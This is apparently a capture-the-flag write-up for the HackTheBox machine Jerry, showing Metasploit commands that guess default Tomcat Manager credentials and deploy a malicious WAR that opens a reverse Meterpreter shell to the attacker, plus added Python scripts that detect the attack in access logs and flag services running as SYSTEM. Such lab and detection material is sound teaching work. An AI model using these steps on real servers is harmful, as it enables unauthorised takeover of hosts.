HackTheBox Jerry
Writeup for HackTheBox Jerry
Machine Synopsis
IP Address: 10.129.136.9
Key Exploitation Techniques:
- Credential Brute-Force: Discovering default credentials for the Apache Tomcat Manager application.
- Web Application Deployment: Gaining remote code execution by uploading a malicious WAR file via the Tomcat Manager.
- Immediate SYSTEM Access: The Tomcat service runs with NT AUTHORITY\SYSTEM privileges, so the initial shell is already a SYSTEM (root-equivalent) shell and no privilege escalation is needed.
1. Enumeration
Initial reconnaissance with nmap revealed a single open port.
nmap -p- --min-rate 1000 -T4 10.129.136.9 -oN nmap_portscan.txt
A more detailed service and script scan identified the service running on port 8080.
nmap -sC -sV -p 8080 -T4 10.129.136.9 -oN nmap_services.txt
Nmap Results:
- Port 8080 (HTTP): The service is identified as Apache Tomcat/7.0.88, a popular open-source servlet container used to deploy Java web applications.
Navigating to http://10.129.136.9:8080 displays the default Tomcat landing page. The Manager App link leads to a login prompt.
2. Exploitation
Step 2.1: Credential Brute-Force
The Apache Tomcat Manager requires authentication. Since a login prompt appeared and we did not have a valid set of credentials, we assumed that default or weak credentials might be in use.
The Metasploit module auxiliary/scanner/http/tomcat_mgr_login automates this process by trying a built-in list of default and common Tomcat Manager credentials.
msfconsole -q
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.136.9
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8080
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
The scan found a valid credential pair: tomcat:s3cret.
[+] 10.129.136.9:8080 - Login Successful: tomcat:s3cret
Step 2.2: Deploying a Malicious Web Application
The Tomcat Manager allows new applications to be deployed by uploading a WAR (Web Application Archive) file, a compressed package of Java web application files. Because the Manager runs whatever WAR it is given, a WAR containing attacker-supplied code executes on the server with the privileges of the Tomcat service.
The Metasploit module exploit/multi/http/tomcat_mgr_upload automates the entire process: it generates a payload, wraps it in a WAR file, uploads it through the Tomcat Manager, and requests the deployed application to trigger the payload and obtain a shell.
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.129.136.9
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost tun0
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 4444
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
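Both of the preceding steps, the credential guessing against the Manager and the WAR deployment, leave a clear trail in Tomcat's access log: the default AccessLogValve writes one common-format line per request, including the authenticated user, the request path and the status code. The following is an added detection example, written for this page and not part of the original writeup or of the Metasploit modules. The log lines are constructed for illustration; the deploy paths cover both the Manager's HTML upload form and its text interface; the failure threshold and time window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Default Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Manager endpoints that install code on the server: the HTML upload form and
# the text/script interface used by automated tooling. A successful hit on any
# of them changes what the server runs and deserves an alert on its own.
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy|deploy)(\?|$)')
MANAGER_RE = re.compile(r'^/manager(/|$)')


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, fail_threshold=5, window=timedelta(seconds=60)):
    """Return (severity, source_ip, message) alerts for Manager abuse.

    A browser normally produces a single 401 before it sends credentials, so a
    burst of 401s on /manager from one source indicates a guessing tool.
    """
    alerts = []
    failures = defaultdict(list)  # source ip -> timestamps of recent 401s
    flagged = set()               # sources already reported for guessing
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host, path, status = rec["host"], rec["path"], rec["status"]
        if MANAGER_RE.match(path) and status == 401:
            ts = failures[host]
            ts.append(rec["time"])
            while ts and rec["time"] - ts[0] > window:  # slide the window
                ts.pop(0)
            if len(ts) >= fail_threshold and host not in flagged:
                flagged.add(host)
                alerts.append(("medium", host,
                               f"{len(ts)} Manager login failures within "
                               f"{int(window.total_seconds())}s (credential brute-force)"))
        elif (DEPLOY_RE.match(path) and rec["method"] in ("PUT", "POST")
              and status in (200, 302)):
            msg = (f"application deployed via {rec['method']} "
                   f"{path.split('?')[0]} as user {rec['user']}")
            if host in flagged:
                alerts.append(("critical", host, msg + " after brute-force"))
            else:
                alerts.append(("high", host, msg))
    return alerts


# Constructed sample log (not captured from the machine): a guessing burst that
# succeeds, followed by a deploy and a request to the new context, then one
# ordinary admin login from another address.
SAMPLE_LOG = """\
10.10.14.5 - - [19/Jun/2018:07:10:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [19/Jun/2018:07:10:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [19/Jun/2018:07:10:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [19/Jun/2018:07:10:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [19/Jun/2018:07:10:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [19/Jun/2018:07:10:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [19/Jun/2018:07:10:04 +0000] "GET /manager/html HTTP/1.1" 200 15333
10.10.14.5 - tomcat [19/Jun/2018:07:10:20 +0000] "PUT /manager/text/deploy?path=/HbQ2x HTTP/1.1" 200 54
10.10.14.5 - - [19/Jun/2018:07:10:21 +0000] "GET /HbQ2x/ HTTP/1.1" 200 -
192.168.1.20 - - [19/Jun/2018:08:00:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.20 - admin [19/Jun/2018:08:00:05 +0000] "GET /manager/html HTTP/1.1" 200 15333
"""

if __name__ == "__main__":
    for sev, src, msg in detect(SAMPLE_LOG.splitlines()):
        print(f"[{sev.upper():8}] {src}: {msg}")
```

Run against the sample, the script reports a medium-severity guessing alert for 10.10.14.5 and then a critical one when the same source deploys an application, while the single 401 from the legitimate admin stays below the threshold. The same two signals are what a mitigation should remove: the guessing burst disappears once the LockOutRealm and a non-default password are in place, and deployments become rare, auditable events once the manager-gui/manager-script roles are restricted to a dedicated account.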
The exploit ran successfully and established a Meterpreter session. The getuid command returned the machine account JERRY$, which is how the Java Meterpreter payload reports a service running as NT AUTHORITY\SYSTEM; whoami in a native shell (see the next section) confirms it. The Tomcat service itself runs as SYSTEM, so no privilege escalation was needed to obtain a root-equivalent shell.
meterpreter > getuid
Server username: JERRY$
This is a common misconfiguration on older Windows deployments: services are often installed to run as LocalSystem when a dedicated low-privilege service account would suffice, so any code execution in the service immediately becomes full control of the host.
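The service-account finding above is straightforward to audit. The following added example (written for this page, not code from the writeup) parses the output of `sc qc <service>` and flags a service configured to start as LocalSystem or NT AUTHORITY\SYSTEM. The sample outputs are constructed; the service name Tomcat7 and the hardened account `.\tomcat-svc` are assumed for illustration.

```python
import re
import subprocess

# Accounts that mean "the whole machine": a service bound to any of these
# hands SYSTEM to whoever can make it run code, exactly as on Jerry.
SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system", ".\\localsystem"}

# `sc qc` prints one "KEY : value" line per configuration field.
START_NAME_RE = re.compile(r"^\s*SERVICE_START_NAME\s*:\s*(.*?)\s*$", re.MULTILINE)


def service_account(sc_qc_output: str):
    """Return the account the service starts as, or None if the field is absent."""
    m = START_NAME_RE.search(sc_qc_output)
    return m.group(1) if m else None


def runs_as_system(sc_qc_output: str) -> bool:
    """True if the service starts as LocalSystem / NT AUTHORITY\\SYSTEM."""
    acct = service_account(sc_qc_output)
    return acct is not None and acct.lower() in SYSTEM_ACCOUNTS


def query_service(name: str) -> str:
    """Run `sc qc <name>` on a Windows host and return its text (live use only)."""
    return subprocess.run(["sc", "qc", name], capture_output=True,
                          text=True, check=True).stdout


# Constructed sample: what `sc qc Tomcat7` looks like on a host set up as Jerry
# was (service name assumed; paths follow the install directory seen above).
AS_SYSTEM = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tomcat7
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\apache-tomcat-7.0.88\\bin\\Tomcat7.exe //RS//Tomcat7
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Apache Tomcat 7.0 Tomcat7
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed sample: the same service after being moved to a dedicated
# low-privilege local account (account name is hypothetical).
HARDENED = AS_SYSTEM.replace("SERVICE_START_NAME : LocalSystem",
                             "SERVICE_START_NAME : .\\tomcat-svc")

if __name__ == "__main__":
    for label, out in (("as shipped", AS_SYSTEM), ("hardened", HARDENED)):
        verdict = "FLAG: runs as SYSTEM" if runs_as_system(out) else "ok"
        print(f"{label}: starts as {service_account(out)} -> {verdict}")
```

On a live host, `runs_as_system(query_service("Tomcat7"))` gives the same verdict from the real configuration. The fix the check points at is the standard one: create a local account with no interactive logon rights, grant it modify access only to the Tomcat directories it needs (logs, temp, work, webapps), and set it as the service's logon account, so a compromised web application yields that account rather than SYSTEM.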
3. Flag Retrieval
With a SYSTEM shell, we were able to navigate to the Administrator's desktop and locate the flags.
meterpreter > shell
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
nt authority\system
C:\apache-tomcat-7.0.88>dir "C:\Users\Administrator\Desktop\flags"
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,419,658,752 bytes free
C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
<redacted>
root.txt
<redacted>